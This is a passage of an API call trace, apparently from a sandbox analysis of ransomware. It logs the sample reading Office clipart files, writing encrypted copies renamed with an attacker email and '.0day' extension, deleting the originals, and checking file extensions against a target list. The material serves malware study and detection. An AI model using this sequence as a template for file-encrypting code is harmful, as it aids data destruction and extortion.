Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 0x20 [0052.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.243] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.243] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.243] GetLastError () returned 0x0 [0052.243] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xa24, lpOverlapped=0x0) returned 1 [0052.245] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xa30, lpOverlapped=0x0) returned 1 [0052.246] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.246] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.246] SetEndOfFile (hFile=0x210) returned 1 [0052.246] CloseHandle (hObject=0x210) returned 1 [0052.246] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.246] SetEndOfFile (hFile=0x220) returned 1 [0052.247] CloseHandle (hObject=0x220) returned 1 [0052.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.247] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0052.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0052.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0052.247] lstrlenW (lpString=".doc") returned 4 [0052.247] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.247] lstrlenW (lpString=".docx") returned 5 [0052.247] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.247] lstrlenW (lpString=".pdf") returned 4 [0052.247] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.247] lstrlenW (lpString=".xls") returned 4 [0052.247] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.248] lstrlenW (lpString=".xlsx") returned 5 [0052.248] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.248] lstrlenW (lpString=".ppt") returned 4 [0052.248] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0052.248] lstrlenW (lpString=".zip") returned 4 [0052.248] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.248] lstrlenW (lpString=".rar") returned 4 [0052.248] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.248] lstrlenW (lpString=".bz2") returned 4 [0052.248] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.248] lstrlenW (lpString=".7z") returned 3 [0052.248] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0052.248] lstrlenW (lpString=".dbf") returned 4 [0052.248] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0052.248] lstrlenW (lpString=".1cd") returned 4 [0052.248] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0052.248] lstrlenW (lpString=".jpg") returned 4 [0052.248] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.249] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=10607) returned 1 [0052.249] CloseHandle (hObject=0x220) returned 1 [0052.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 0x20 [0052.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.249] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.249] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.250] GetLastError () returned 0x0 [0052.250] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x296f, lpOverlapped=0x0) returned 1 [0052.251] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2970, lpOverlapped=0x0) returned 1 [0052.252] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.252] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.252] SetEndOfFile (hFile=0x210) returned 1 [0052.252] CloseHandle (hObject=0x210) returned 1 [0052.253] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.253] SetEndOfFile (hFile=0x220) returned 1 [0052.253] CloseHandle (hObject=0x220) returned 1 [0052.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.254] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0052.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0052.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0052.254] lstrlenW (lpString=".doc") returned 4 [0052.254] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.254] lstrlenW (lpString=".docx") returned 5 [0052.254] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.254] lstrlenW (lpString=".pdf") returned 4 [0052.254] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.254] lstrlenW (lpString=".xls") returned 4 [0052.254] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.254] lstrlenW (lpString=".xlsx") returned 5 [0052.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.254] lstrlenW (lpString=".ppt") returned 4 [0052.254] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0052.254] lstrlenW (lpString=".zip") returned 4 [0052.254] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.254] lstrlenW (lpString=".rar") returned 4 [0052.254] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.254] lstrlenW (lpString=".bz2") returned 4 [0052.254] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.254] lstrlenW (lpString=".7z") returned 3 [0052.254] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0052.254] lstrlenW (lpString=".dbf") returned 4 [0052.254] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0052.254] lstrlenW (lpString=".1cd") returned 4 [0052.255] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0052.255] lstrlenW (lpString=".jpg") returned 4 [0052.255] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.255] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=15308) returned 1 [0052.255] CloseHandle (hObject=0x220) returned 1 [0052.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 0x20 [0052.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.255] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.255] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.256] GetLastError () returned 0x0 [0052.256] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x3bcc, lpOverlapped=0x0) returned 1 [0052.257] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x3bd0, lpOverlapped=0x0) returned 1 [0052.258] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.258] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.259] SetEndOfFile (hFile=0x210) returned 1 [0052.259] CloseHandle (hObject=0x210) returned 1 [0052.259] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.259] SetEndOfFile (hFile=0x220) returned 1 [0052.260] CloseHandle (hObject=0x220) returned 1 [0052.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.260] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0052.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0052.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0052.260] lstrlenW (lpString=".doc") returned 4 [0052.260] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.260] lstrlenW (lpString=".docx") returned 5 [0052.260] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.260] lstrlenW (lpString=".pdf") returned 4 [0052.260] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.260] lstrlenW (lpString=".xls") returned 4 [0052.260] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.260] lstrlenW (lpString=".xlsx") returned 5 [0052.260] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.260] lstrlenW (lpString=".ppt") returned 4 [0052.261] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0052.261] lstrlenW (lpString=".zip") returned 4 [0052.261] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.261] lstrlenW (lpString=".rar") returned 4 [0052.261] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.261] lstrlenW (lpString=".bz2") returned 4 [0052.261] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.261] lstrlenW (lpString=".7z") returned 3 [0052.261] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0052.261] lstrlenW (lpString=".dbf") returned 4 [0052.261] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0052.261] lstrlenW (lpString=".1cd") returned 4 [0052.261] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0052.261] lstrlenW (lpString=".jpg") returned 4 [0052.261] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.261] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=5315) returned 1 [0052.261] CloseHandle (hObject=0x220) returned 1 [0052.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 0x20 [0052.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.262] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.262] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.262] GetLastError () returned 0x0 [0052.262] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x14c3, lpOverlapped=0x0) returned 1 [0052.419] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x14d0, lpOverlapped=0x0) returned 1 [0052.420] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.420] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.420] SetEndOfFile (hFile=0x210) returned 1 [0052.629] CloseHandle (hObject=0x210) returned 1 [0052.630] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.630] SetEndOfFile (hFile=0x220) returned 1 [0052.630] CloseHandle (hObject=0x220) returned 1 [0052.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0053.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.094] lstrlenW (lpString=".doc") returned 4 [0053.095] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.095] lstrlenW (lpString=".docx") returned 5 [0053.096] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.099] lstrlenW (lpString=".pdf") returned 4 [0053.103] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.108] lstrlenW (lpString=".xls") returned 4 [0053.109] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.109] lstrlenW (lpString=".xlsx") returned 5 [0053.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.231] lstrlenW (lpString=".ppt") returned 4 [0053.279] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.427] lstrlenW (lpString=".zip") returned 4 [0053.427] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.428] lstrlenW (lpString=".rar") returned 4 [0053.428] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.428] lstrlenW (lpString=".bz2") returned 4 [0053.429] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.432] lstrlenW (lpString=".7z") returned 3 [0053.432] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.433] lstrlenW (lpString=".dbf") returned 4 [0053.433] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.434] lstrlenW (lpString=".1cd") returned 4 [0053.435] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.437] lstrlenW (lpString=".jpg") returned 4 [0053.440] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.801] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.801] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.801] GetLastError () returned 0x0 [0053.801] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2186, lpOverlapped=0x0) returned 1 [0053.803] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2190, lpOverlapped=0x0) returned 1 [0053.804] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.804] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.804] SetEndOfFile (hFile=0x238) returned 1 [0053.804] CloseHandle (hObject=0x238) returned 1 [0053.804] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.804] SetEndOfFile (hFile=0x234) returned 1 [0053.805] CloseHandle (hObject=0x234) returned 1 [0053.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0053.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.805] lstrlenW (lpString=".doc") returned 4 [0053.806] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.806] lstrlenW (lpString=".docx") returned 5 [0053.806] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.806] lstrlenW (lpString=".pdf") returned 4 [0053.806] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.806] lstrlenW (lpString=".xls") returned 4 [0053.806] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.806] lstrlenW (lpString=".xlsx") returned 5 [0053.806] lstrcmpiW 